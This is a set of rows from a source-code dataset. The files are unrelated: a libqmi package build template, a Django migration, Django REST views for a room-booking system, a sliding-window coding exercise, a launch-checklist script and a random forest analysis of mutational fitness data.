seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
953022142 | pkgname = "libqmi"
# cports build-template metadata for libqmi (QMI modem protocol library).
pkgver = "1.34.0"
pkgrel = 0
build_style = "meson"
# Enable QRTR (Qualcomm IPC router) support and GObject introspection data.
configure_args = [
    "-Dqrtr=true",
    "-Dintrospection=true",
]
# Tools and libraries required on the build host.
hostmakedepends = [
    "bash-completion",
    "glib-devel",
    "gobject-introspection",
    "help2man",
    "libgudev-devel",
    "libmbim-devel",
    "libqrtr-glib-devel",
    "meson",
    "pkgconf",
]
# Build dependencies for the target.
makedepends = ["glib-devel", "libgudev-devel", "linux-headers"]
pkgdesc = "QMI modem protocol helper library"
maintainer = "q66 <q66@chimera-linux.org>"
license = "GPL-2.0-or-later AND LGPL-2.1-or-later"
url = "https://www.freedesktop.org/wiki/Software/libqmi"
# Upstream release tarball; pkgver is interpolated into the download URL.
source = f"https://gitlab.freedesktop.org/mobile-broadband/libqmi/-/archive/{pkgver}/libqmi-{pkgver}.tar.gz"
sha256 = "8690d25b4d110b6df28b31da0a8bf16c7e966d31abcfeeb854f2753451e7a400"
# Split development files (headers, pkg-config data, .so symlinks) into a
# separate libqmi-devel subpackage using the framework's stock -devel rules.
@subpackage("libqmi-devel")
def _devel(self):
    return self.default_devel()
| chimera-linux/cports | main/libqmi/template.py | template.py | py | 869 | python | en | code | 119 | github-code | 36 |
37219887215 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Set Spanish verbose names on the UserGiallorosso model's Meta options.

    Pure Meta change (admin display text only) — no database schema impact.
    """

    # Must run after the app's initial schema migration.
    dependencies = [
        ('community', '0001_initial'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='usergiallorosso',
            options={'verbose_name': 'Usuario Giallorosso', 'verbose_name_plural': 'Usuarios Giallorossos'},
        ),
    ]
| vaquer/ilGiallorosso | ilGiallorosso/community/migrations/0002_auto_20151127_1820.py | 0002_auto_20151127_1820.py | py | 434 | python | en | code | 0 | github-code | 36 |
24060886042 | date = "Monday 2019-03-18"
# Launch-checklist script: reads crew details from stdin and prints a
# formatted pre-launch report (ship info plus a mass breakdown).
launch_time = "10:05:34 AM"
astronaut_mass_kg = 80.7  # average mass per crew member
fuel_mass_kg = 760000
ship_mass_kg = 74842.31
fuel_level = "100%"

# Interactive inputs.
crew_count = int(input("Enter number of astronauts in crew: "))
crew_status = input("Enter crew status, Ready or Not Ready: ")

# Derived totals for the mass report.
crew_mass_kg = crew_count * astronaut_mass_kg
total_mass_kg = crew_mass_kg + ship_mass_kg + fuel_mass_kg

divider = "-------------------"
print(f"> LAUNCH CHECKLIST\n{divider}\nDate: {date}\nTime: {launch_time}\n\n{divider}\n> SHIP INFO\n{divider}")
print(f"* Crew: {crew_count}\n* Crew Status: {crew_status}\n* Fuel Level: {fuel_level}\n\n")
print(f"{divider}\n> MASS DATA\n{divider}\n* Crew: {crew_mass_kg} kg\n* Fuel: {fuel_mass_kg} kg")
print(f"* Spaceship: {ship_mass_kg} kg\n* Total Mass: {total_mass_kg} kg")
| SheaCooke/Python_Chapter4_Studio | Chapter4_Studio.py | Chapter4_Studio.py | py | 876 | python | en | code | 0 | github-code | 36 |
4078600392 | class Solution:
def average(self, A, B, start, end):
    """Return the mean of the window A[start:end], divided by window size B.

    Replaces the manual accumulator loop, which shadowed the builtin
    name ``sum``, with the builtin over a slice.
    """
    return sum(A[start:end]) / B
def solve1(self, A, B):
    """Brute-force O(n*B) search for the start index of the length-B
    window of A with the smallest average.

    NOTE(review): this definition is DEAD CODE — a second ``solve1`` is
    defined later in the same class body, and Python keeps only the last
    binding, so this version is never callable on instances.
    """
    least_avg = 999999999  # sentinel larger than any expected average
    min_idx = 0
    for i in range(len(A)-B+1):
        j = i+B
        temp = self.average(A,B,i,j)
        if least_avg > temp:
            least_avg = temp
            min_idx = i
    return min_idx
def solve(self, A, B):
    """Return (start_index, min_average) of the length-B window of A
    with the smallest average, using an O(n) sliding-window sum.

    Fix: removed a leftover debug ``print`` that polluted stdout on
    every call. Ties keep the earliest window (strict < comparison).
    """
    window_sum = sum(A[:B])
    # (window sum, start index, end index) for every length-B window.
    windows = [(window_sum, 0, B - 1)]
    for i in range(B, len(A)):
        # Slide by one: add the entering element, drop the leaving one.
        window_sum += A[i] - A[i - B]
        windows.append((window_sum, i - B + 1, i))
    best_avg = windows[0][0] / B
    best_idx = windows[0][1]
    for total, start, _end in windows[1:]:
        if total / B < best_avg:
            best_avg = total / B
            best_idx = start
    return best_idx, best_avg
def solve1(self, A, B):
    """Return (start_index, min_average) of the length-B window of A
    with the smallest average — O(n) sliding window, O(1) extra space.

    Fix: removed a leftover debug ``print`` that polluted stdout on
    every call. Ties keep the earliest window (strict < comparison).
    """
    window_sum = sum(A[:B])
    best_idx = 0
    best_avg = window_sum / B
    for i in range(B, len(A)):
        # Slide by one: add the entering element, drop the leaving one.
        window_sum += A[i] - A[i - B]
        if window_sum / B < best_avg:
            best_avg = window_sum / B
            best_idx = i - B + 1
    return best_idx, best_avg
# Ad-hoc fixtures: (array, window length) pairs exercised by hand.
A = [18, 11, 16, 19, 11, 9, 8, 15, 3, 10, 9, 20, 1, 19]
B = 1
A1 = [3, 7, 90, 20, 10, 50, 40]
B1 = 3
A2 = [3, 7, 5, 20, -10, 0, 12]
B2 = 2
A3 = [15, 7, 11, 7, 9, 8, 18, 1, 16, 18, 6, 1, 1, 4, 18]
B3 = 6
# Run the window-list implementation on the last fixture.
print(Solution().solve(A3, B3))
print(Solution().solve1(A3, B3)) | VishalDeoPrasad/InterviewBit | 01. Arrays/Subarray with least average.py | Subarray with least average.py | py | 1,586 | python | en | code | 1 | github-code | 36 |
22501232171 | """ Module to implement Views for all API Queries"""
from rest_framework.views import APIView
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.authtoken.models import Token
from rest_framework import serializers
from rest_framework.response import Response
from rest_framework import status, generics
from django.shortcuts import get_object_or_404
from django.contrib.auth import authenticate
from django.contrib.auth.models import Group
from .serializers import UserSerializer, CustomerSerializer, ManagerSerializer, AdminSerializer, RoomSerializer, SlotSerializer, ReservationLinkSerializer, ReservationSerializer, ActiveReservationSerializer, EmployeeIDSerializer
from users.models import User, Customer, Manager, Admin, EmployeeID
from users.constants import EMPLOYEE_PREFIXES
from manager_iface.models import Room, Slot
from customer_iface.utilities import send_generated_key
from customer_iface.models import IsolatedResData, Reservation
from datetime import datetime
class GenerateAuthToken(APIView):
    """Issue DRF auth tokens to admin users.

    GET returns usage instructions; POST validates admin credentials and
    returns (creating if necessary) the caller's API token.
    """

    def get(self, request):
        # Static usage/help payload describing the expected POST body.
        info = {
            'message': "Obtain or view your API Authentication Token if you are an admin by sending a POST request to this URL",
            'format': "Required JSON format - {'email':<your_email_id>, 'password':<your_password>}",
            'example': "{'email':'admin@gmail.com', 'password':'secret'}",
        }
        return Response(info, status=status.HTTP_200_OK)

    def post(self, request, *args, **kwargs):
        email = request.data['email']
        password = request.data['password']
        # Look up the account for the supplied email.
        try:
            account = User.objects.get(email=email)
        except User.DoesNotExist:
            return Response({'error':"User Not Found"}, status=status.HTTP_404_NOT_FOUND)
        # Guard clause: reject bad credentials.
        if not authenticate(email=account.email, password=password):
            return Response({'error':"Authentication Failed"}, status=status.HTTP_401_UNAUTHORIZED)
        # Guard clause: only members of the admin group may obtain tokens.
        if Group.objects.get(user=account).name != "AdminPrivilege":
            return Response({'error':"Must be admin"}, status=status.HTTP_401_UNAUTHORIZED)
        # Reuse the existing token or mint a new one.
        token, _created = Token.objects.get_or_create(user=account)
        return Response({
            'token': token.key,
            'email': account.email
        }, status=status.HTTP_200_OK)
class UserHandler(APIView):
    """List every User account (GET).

    Users are never created through this endpoint — they come into
    existence via the Customer/Manager/Admin handlers.
    """
    serializer_class = UserSerializer
    queryset = User.objects.all()

    def get(self, request, format=None):
        # many=True: serialize the entire queryset.
        serialized = self.serializer_class(
            User.objects.all(), many=True, context={'request':request}
        )
        return Response(serialized.data)
# CANNOT CREATE USER DIRECTLY, HAS TO BE CUSTOMER, MANAGER or ADMIN
class UserDetail(generics.RetrieveAPIView):
    """Retrieve (GET) or delete (DELETE) a single User, looked up by id."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
    lookup_field = 'id'

    def delete(self, request, id):
        # Fetch-or-None instead of try/except; id is the unique PK.
        user = User.objects.filter(id=id).first()
        if user is None:
            return Response({"message": "User not found."}, status=404)
        user.delete()
        return Response({"message": "User and relevant data have been deleted."}, status=204)
class CustomerHandler(APIView):
    """List (GET) and create (POST) Customer accounts.

    POST pops the shared User fields (email, name, password) out of
    request.data, validates them with UserSerializer, validates the
    remaining fields with CustomerSerializer, and saves both rows only
    once everything passes. The new user joins the CustomerPrivilege group.
    """
    serializer_class = CustomerSerializer
    queryset = Customer.objects.all()

    def get(self, request, format=None):
        users = Customer.objects.all()
        # many=True: serialize every Customer row.
        serializer = CustomerSerializer(users, many=True, context={'request':request})
        return Response(serializer.data)

    def post(self, request, format=None):
        user_data = dict()
        # NOTE(review): pop() without a default raises KeyError (-> HTTP 500)
        # when 'email' or 'name' is missing from the payload — confirm intended.
        user_data['email'] = request.data.pop('email')
        user_data['name'] = request.data.pop('name')
        user_data['password'] = request.data.pop('password', None)  # checked explicitly below
        if(not user_data['password']):
            return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
        # Validate the User part first, then the Customer-specific part.
        user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
        if(user_serial.is_valid()):
            serializer = (self.serializer_class)(data=request.data, context={'request':request})
            if(serializer.is_valid()):
                # Both valid: persist the User, then the Customer profile.
                user_serial.save(is_staff=False, is_superuser=False)
                user = User.objects.get(email=user_data['email'])
                serializer.save(instance=user)
                cust_group = Group.objects.get(name="CustomerPrivilege")  # grant customer role
                cust_group.user_set.add(user)
                return Response(serializer.data, status=status.HTTP_201_CREATED)
            else:
                err = serializer.errors
        else:
            err = user_serial.errors
        return Response(err, status=status.HTTP_400_BAD_REQUEST)
class CustomerDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) one Customer, addressed by the
    id of its underlying User row."""
    queryset = Customer.objects.all()
    serializer_class = CustomerSerializer
    custom_lookup_field = 'id'

    def get_object(self):
        # Resolve the User by our custom field, then hand back its
        # Customer profile (the serializer works on Customer instances).
        lookup = {self.custom_lookup_field: self.kwargs[self.custom_lookup_field]}
        user = get_object_or_404(User.objects.all(), **lookup)
        self.check_object_permissions(self.request, user)
        return user.customer

    def delete(self, request, id):
        # Fetch-or-None instead of try/except; id is the unique PK.
        user = User.objects.filter(id=id).first()
        if user is None:
            return Response({"message": "Customer not found."}, status=404)
        user.delete()
        return Response({"message": "Customer and relevant data have been deleted."}, status=204)
class ManagerHandler(APIView):
    """List (GET) and create (POST) Manager accounts.

    POST pops the shared User fields out of request.data, checks that the
    supplied employee ID exists, carries the MAN prefix, and is not already
    held by a Manager, then saves the User and Manager rows once both
    serializers validate. The new user joins the ManagerPrivilege group.
    """
    serializer_class = ManagerSerializer
    queryset = Manager.objects.all()

    def id_exists(self, value):
        # True if some Manager already holds this employee ID.
        if(Manager.objects.filter(emp_id=value).count()==0):
            return False
        else:
            return True

    def id_valid(self, value):
        # True if the ID is a known EmployeeID with the manager prefix.
        existing_ids = tuple(map(str,EmployeeID.objects.all()))
        if(value in existing_ids):
            if(value[:3]=="MAN"):  # must be a manager-type employee ID
                return True
            else:
                return False
        else:
            return False

    def get(self, request, format=None):
        users = Manager.objects.all()
        # many=True: serialize every Manager row.
        serializer = ManagerSerializer(users, many=True, context={'request':request})
        return Response(serializer.data)

    def post(self, request, format=None):
        user_data = dict()
        # NOTE(review): pop() without a default raises KeyError (-> HTTP 500)
        # when 'email' or 'name' is absent — confirm intended.
        user_data['email'] = request.data.pop('email')
        user_data['name'] = request.data.pop('name')
        user_data['password'] = request.data.pop('password', None)  # checked explicitly below
        if(not user_data['password']):
            return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
        id_check = request.data.pop('emp_id', None)
        if(not id_check):
            return Response({"error":"Employee ID is required"}, status=status.HTTP_400_BAD_REQUEST)
        if((self.id_exists(id_check)) or (not self.id_valid(id_check))):
            return Response({"error":"Employee ID is invalid"}, status=status.HTTP_400_BAD_REQUEST)
        empid_inst = EmployeeID.objects.get(emp_id=id_check)  # the ID record to assign
        user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
        if(user_serial.is_valid()):
            serializer = (self.serializer_class)(data=request.data, context={'request':request})
            if(serializer.is_valid()):
                # Both valid: create the staff User, bind the employee ID
                # to them, then create the Manager profile.
                user_serial.save(is_staff=True, is_superuser=False)
                user = User.objects.get(email=user_data['email'])
                empid_inst.assignee = user
                empid_inst.save()
                serializer.save(instance=user, emp_id=empid_inst)
                manager_group = Group.objects.get(name="ManagerPrivilege")  # grant manager role
                manager_group.user_set.add(user)
                return Response(serializer.data, status=status.HTTP_201_CREATED)
            else:
                err = serializer.errors
        else:
            err = user_serial.errors
        return Response(err, status=status.HTTP_400_BAD_REQUEST)
class ManagerDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) one Manager, addressed by the
    id of its underlying User row."""
    queryset = Manager.objects.all()
    serializer_class = ManagerSerializer
    custom_lookup_field = 'id'

    def get_object(self):
        # Resolve the User first, then hand back its Manager profile.
        lookup = {self.custom_lookup_field: self.kwargs[self.custom_lookup_field]}
        user = get_object_or_404(User.objects.all(), **lookup)
        self.check_object_permissions(self.request, user)
        return user.manager

    def delete(self, request, id):
        # Fetch-or-None instead of try/except; id is the unique PK.
        user = User.objects.filter(id=id).first()
        if user is None:
            return Response({"message": "Manager not found."}, status=404)
        user.delete()
        return Response({"message": "Manager and relevant data have been deleted."}, status=204)
class AdminHandler(APIView):
    """List (GET) and create (POST) Admin accounts.

    POST mirrors ManagerHandler.post: the shared User fields are popped
    out of request.data, the employee ID is checked (must exist, carry the
    ADM prefix, and be unassigned), and both rows are saved only once both
    serializers validate. The new user joins the AdminPrivilege group.
    """
    serializer_class = AdminSerializer
    queryset = Admin.objects.all()

    def id_exists(self, value):
        # Bug fix: this previously queried Manager (copy-paste from
        # ManagerHandler), so an ID already held by an existing Admin
        # slipped past the availability check.
        if(Admin.objects.filter(emp_id=value).count()==0):
            return False
        else:
            return True

    def id_valid(self, value):
        # True if the ID is a known EmployeeID with the admin prefix.
        existing_ids = tuple(map(str,EmployeeID.objects.all()))
        if(value in existing_ids):
            if(value[:3]=="ADM"):  # must be an admin-type employee ID
                return True
            else:
                return False
        else:
            return False

    def get(self, request, format=None):
        users = Admin.objects.all()
        # many=True: serialize every Admin row.
        serializer = AdminSerializer(users, many=True, context={'request':request})
        return Response(serializer.data)

    def post(self, request, format=None):
        user_data = dict()
        user_data['email'] = request.data.pop('email')
        user_data['name'] = request.data.pop('name')
        user_data['password'] = request.data.pop('password', None)  # checked explicitly below
        if(not user_data['password']):
            return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
        id_check = request.data.pop('emp_id', None)
        if(not id_check):
            return Response({"error":"Employee ID is required"}, status=status.HTTP_400_BAD_REQUEST)
        if((self.id_exists(id_check)) or (not self.id_valid(id_check))):
            return Response({"error":"Employee ID is invalid"}, status=status.HTTP_400_BAD_REQUEST)
        empid_inst = EmployeeID.objects.get(emp_id=id_check)  # the ID record to assign
        user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
        if(user_serial.is_valid()):
            serializer = (self.serializer_class)(data=request.data, context={'request':request})
            if(serializer.is_valid()):
                # Both valid: create the superuser User, bind the employee
                # ID to them, then create the Admin profile.
                user_serial.save(is_staff=True, is_superuser=True)
                user = User.objects.get(email=user_data['email'])
                empid_inst.assignee = user
                empid_inst.save()
                serializer.save(instance=user, emp_id=empid_inst)
                adm_group = Group.objects.get(name="AdminPrivilege")  # grant admin role
                adm_group.user_set.add(user)
                return Response(serializer.data, status=status.HTTP_201_CREATED)
            else:
                err = serializer.errors
        else:
            err = user_serial.errors
        return Response(err, status=status.HTTP_400_BAD_REQUEST)
class AdminDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) one Admin, addressed by the id
    of its underlying User row."""
    queryset = Admin.objects.all()
    serializer_class = AdminSerializer
    custom_lookup_field = 'id'

    def get_object(self):
        # Resolve the User first, then hand back its Admin profile.
        lookup = {self.custom_lookup_field: self.kwargs[self.custom_lookup_field]}
        user = get_object_or_404(User.objects.all(), **lookup)
        self.check_object_permissions(self.request, user)
        return user.admin

    def delete(self, request, id):
        # Fetch-or-None instead of try/except; id is the unique PK.
        user = User.objects.filter(id=id).first()
        if user is None:
            return Response({"message": "Admin not found."}, status=404)
        user.delete()
        return Response({"message": "Admin and relevant data have been deleted."}, status=204)
class EmpidHandler(APIView):
    """List (GET) and create (POST) EmployeeID records.

    POST generates the next sequential ID for the requested employee type
    (e.g. MAN007), records the requesting admin as creator, and e-mails the
    generated key to them.
    """
    serializer_class = EmployeeIDSerializer
    queryset = EmployeeID.objects.all()

    def get(self, request, format=None):
        ids = EmployeeID.objects.all()
        # many=True: serialize every EmployeeID row.
        serializer = EmployeeIDSerializer(ids, many=True, context={'request':request})
        return Response(serializer.data)

    def post(self, request, format=None):
        emp_type = request.data['emp_type']
        creator = request.user  # permission setup restricts this view to admins
        serializer = (self.serializer_class)(data=request.data, context={'request':request})
        if(serializer.is_valid()):
            # Build e.g. "MAN007": type prefix + zero-padded running count.
            pre = EMPLOYEE_PREFIXES[emp_type]
            gen_empid = pre+(str(EmployeeID.objects.filter(emp_type=emp_type).count()+1).rjust(3,'0'))
            serializer.save(emp_id=gen_empid, creator=creator)
            empid_inst = EmployeeID.objects.get(emp_id=gen_empid)
            send_generated_key(empid_inst)  # notify the admin by e-mail
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        # Bug fix: the invalid branch referenced the undefined name
        # 'user_serial' (copy-paste from the user handlers) and raised
        # NameError; report this serializer's errors instead.
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class EmpidDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or release (DELETE) an EmployeeID.

    DELETE removes the assigned employee User (and their data) but keeps
    the EmployeeID row itself so the ID can be re-issued later.
    """
    queryset = EmployeeID.objects.all()
    serializer_class = EmployeeIDSerializer
    lookup_field = 'emp_id'

    def delete(self, request, emp_id):
        # Bug fix: the lookup raises EmployeeID.DoesNotExist — the old code
        # caught User.DoesNotExist, which never fires here, so an unknown
        # emp_id produced an unhandled exception instead of a 404.
        try:
            empid_inst = EmployeeID.objects.get(emp_id=emp_id)
        except EmployeeID.DoesNotExist:
            return Response({"message": "Employee ID not found."}, status=404)
        user = empid_inst.assignee
        # Bug fix: an unassigned ID has assignee=None; calling delete() on
        # None crashed. Nothing to remove in that case.
        if user is not None:
            user.delete()
            empid_inst.assignee = None
            empid_inst.save()  # ID stays on record, available for reuse
        return Response({"message": "Emplyee Deleted. ID Avalaible for Re-Assignment"}, status=204)
class RoomHandler(generics.RetrieveAPIView):
    """List every Room (GET). Requires token authentication."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    queryset = Room.objects.all()

    def get(self, request, format=None):
        # many=True: serialize the whole room list.
        serialized = RoomSerializer(
            Room.objects.all(), many=True, context={'request':request}
        )
        return Response(serialized.data)
class RoomDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) one Room by room number.

    Deleting a room cascades to its reservations; a pre_delete signal on
    the Reservation model marks the isolated reservation data Cancelled.
    """
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    queryset = Room.objects.all()
    serializer_class = RoomSerializer
    lookup_field = 'room_no'

    def delete(self, request, room_no):
        # Robustness fix: an unknown room_no used to raise Room.DoesNotExist
        # (unhandled -> HTTP 500); answer with a 404 instead.
        try:
            this_room = self.queryset.get(room_no=room_no)
        except Room.DoesNotExist:
            return Response({"message": "Room not found."}, status=404)
        # Cancellation of affected reservations happens in the pre_delete
        # signal attached to the Reservation model.
        this_room.delete()
        return Response({"message": "Room and relevant data have been deleted."}, status=204)
class SlotHandler(generics.RetrieveAPIView):
    """List every Slot (GET). Requires token authentication."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    queryset = Slot.objects.all()

    def get(self, request, format=None):
        # many=True: serialize the whole slot list.
        serialized = SlotSerializer(
            Slot.objects.all(), many=True, context={'request':request}
        )
        return Response(serialized.data)
class SlotDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) one Slot by id.

    Deleting a slot cascades to its reservations; a pre_delete signal on
    the Reservation model marks the isolated reservation data Cancelled.
    """
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    queryset = Slot.objects.all()
    serializer_class = SlotSerializer
    lookup_field = 'id'

    def delete(self, request, id):
        # Robustness fix: an unknown id used to raise Slot.DoesNotExist
        # (unhandled -> HTTP 500); answer with a 404 instead.
        try:
            this_slot = self.queryset.get(id=id)
        except Slot.DoesNotExist:
            return Response({"message": "Slot not found."}, status=404)
        # Cancellation of affected reservations happens in the pre_delete
        # signal attached to the Reservation model.
        this_slot.delete()
        return Response({"message": "Slot and relevant data have been deleted."}, status=204)
class AllReservations(APIView):
    """Entry point (GET) returning hyperlinks to the reservation
    sub-listings (past, future, ongoing, cancelled)."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request, format=None):
        # Single-entry queryset for the requesting user; the link
        # serializer only needs one object to render the URL set.
        current_user_qs = User.objects.filter(email=request.user.email)
        links = ReservationLinkSerializer(current_user_qs, many=True, context={'request':request})
        return Response(links.data)
class PastReservations(APIView):
    """List reservations whose slot has already ended (GET)."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request, format=None):
        # Consistency fix: derive date and time from a single timestamp so
        # the two cannot straddle midnight between separate now() calls.
        current = datetime.now()
        today = current.date()
        now = current.time()
        # Past = any earlier day, or earlier today with the slot already over.
        reserves = (IsolatedResData.objects.filter(date__lt=today, status="Active")
                    | IsolatedResData.objects.filter(date=today, end_time__lt=now, status="Active"))
        serializer = ReservationSerializer(reserves, many=True, context={'request':request})
        return Response(serializer.data)
class FutureReservations(APIView):
    """List reservations that have not started yet (GET)."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request, format=None):
        # Consistency fix: derive date and time from a single timestamp so
        # the two cannot straddle midnight between separate now() calls.
        current = datetime.now()
        today = current.date()
        now = current.time()
        # Future = a later day, or later today with the slot not yet begun.
        # (Every row in the Reservation model is an "Active" booking.)
        reserves = (Reservation.objects.filter(date__gt=today)
                    | Reservation.objects.filter(date=today, slot__start_time__gt=now))
        serializer = ActiveReservationSerializer(reserves, many=True, context={'request':request})
        return Response(serializer.data)
class OngoingReservations(APIView):
    """List reservations currently in progress (GET)."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request, format=None):
        current = datetime.now()
        today = current.date()
        now = current.time()
        # Bug fix: the original OR-ed (start_time <= now) with
        # (end_time >= now), which matches nearly every reservation dated
        # today. "Ongoing" requires BOTH: already started AND not yet over.
        reserves = IsolatedResData.objects.filter(
            date=today,
            start_time__lte=now,
            end_time__gte=now,
            status="Active",
        )
        serializer = ReservationSerializer(reserves, many=True, context={'request':request})
        return Response(serializer.data)
class CancelledReservations(APIView):
    """List reservations whose status is 'Cancelled' (GET)."""
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request, format=None):
        cancelled = IsolatedResData.objects.filter(status='Cancelled')
        # many=True: serialize the whole cancelled set.
        payload = ReservationSerializer(cancelled, many=True, context={'request':request}).data
        return Response(payload)
class InactiveReservationDetail(generics.RetrieveAPIView):
    """Read-only detail view (GET) for a single inactive reservation —
    one that is in the past or was cancelled."""
    # DRF's generic view derives the whole GET behaviour from these.
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    lookup_field = 'id'
    serializer_class = ReservationSerializer
    queryset = IsolatedResData.objects.all()
class ActiveReservationManage(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or cancel (DELETE) one active Reservation by id.

    Deleting triggers a pre_delete signal on Reservation that marks the
    matching IsolatedResData record as Cancelled.
    """
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    queryset = Reservation.objects.all()
    serializer_class = ActiveReservationSerializer
    lookup_field = 'id'

    def delete(self, request, id):
        # Robustness fix: an unknown id used to raise
        # Reservation.DoesNotExist (unhandled -> HTTP 500); return 404.
        try:
            this_reserve = self.queryset.get(id=id)
        except Reservation.DoesNotExist:
            return Response({"message": "Reservation not found."}, status=404)
        # Status flip to Cancelled happens in the pre_delete signal.
        this_reserve.delete()
        return Response({"message": "Reservation has been deleted."}, status=204)
| karthik-d/room-slot-booking | roomBookingManager/api/views.py | views.py | py | 22,909 | python | en | code | 4 | github-code | 36 |
2884245779 | # coding:utf-8
# @Time : 2019-04-28 11:13
# @Author: Xiawang
from utils.util import delete_requests, get_app_header
host = 'https://gate.lagou.com/v1/entry'
header = get_app_header(100018934)
def delete_orderId(orderIds):
    """Issue a DELETE for the given order id(s) against the entry gateway."""
    # Same URL as before, built with an f-string instead of str.format.
    url = f"{host}/order/orderId?orderIds={orderIds}"
    return delete_requests(url=url, remark='删除投递记录')
| Ariaxie-1985/aria | api_script/entry/order/orderId.py | orderId.py | py | 391 | python | en | code | 0 | github-code | 36 |
16830841390 | #!/usr/bin/env python
# coding: utf-8
# # Random forest DMS
#
# This script runs the random forest model on the data from the differences in fitness effects: deltaS_weak (S_weak - S_opt)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import Lasso
from sklearn.linear_model import Ridge
from sklearn.tree import DecisionTreeRegressor
from IPython.display import HTML
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from sklearn.preprocessing import PolynomialFeatures
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from statistics import mean
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import mean_squared_error
from sklearn.metrics import accuracy_score
from rfpimp import permutation_importances
from sklearn.base import clone
from sklearn import tree
import graphviz
from sklearn.tree import _tree
import sklearn
# Notebook cell echo of the installed scikit-learn version.
sklearn.__version__

# Load the per-mutation dataset: fitness-effect differences (deltaS) plus
# structural/biophysical features, tab-separated.
dataset = pd.read_csv('../../Data/Complete_datasets/dataset_diffNorm_ara0.2_ara0.01_index_differences.txt', sep='\t')
dataset

# Remove stop codons and rows that are not present in the PDB structure
# (no ddG estimate) or that lack a measured score.
dataset = dataset[(dataset['Residue'] != '*') &
                  (pd.notna(dataset['Mean_ddG_stab_HET'])) &
                  (pd.notna(dataset['diffNormScore']))
                  ]

# Drop identifier / redundant columns so only model features remain.
df = dataset.drop(['Entropy','Position','WT_Residue', 'Residue', 'Arabinose',
                   'Secondary_structure','Solvent_accessibility', 'mean_sel_coeff',
                   'mean_sel_coeff_2', 'Arabinose_2'],axis=1)
df

# Feature matrix X and regression target Y (diffNormScore = deltaS difference).
X = df.drop(['diffNormScore'],axis=1)
Y = df['diffNormScore']

# Normalize all the features to the range of -1 , 1
# NOTE(review): dividing by the column max only yields [-1, 1] when the max
# is positive and at least as large in magnitude as the min — confirm for
# columns that can be negative.
X = X / X.max()
## Train a random forest model (80/20 split, fixed seeds for reproducibility)
X_train,X_test,y_train,y_test =train_test_split(X,Y,test_size=0.2, random_state=100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)

# Training-set fit quality.
# NOTE(review): np.sqrt(mean_squared_error(...)) is the RMSE, although the
# printed label says "Mean squared error".
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))

# Held-out test-set performance.
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))

## Train the random forest again but adding a random variable
# (the random feature later serves as an importance baseline).
np.random.seed(100)
X['random_var'] = np.random.normal(loc = 0, scale = 1, size = X.shape[0])
X_train,X_test,y_train,y_test =train_test_split(X,Y,test_size=0.2, random_state = 100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))

# Use cross-validation on this preliminary model
cross_val_n = 5
print('Five-fold cross validation of the random forest model:')
# NOTE(review): `r2` is only defined further down in this script, so running
# the file top-to-bottom raises NameError on the next line. Move the r2
# definition above this point, or drop scoring= (R^2 is already the default
# score for regressors).
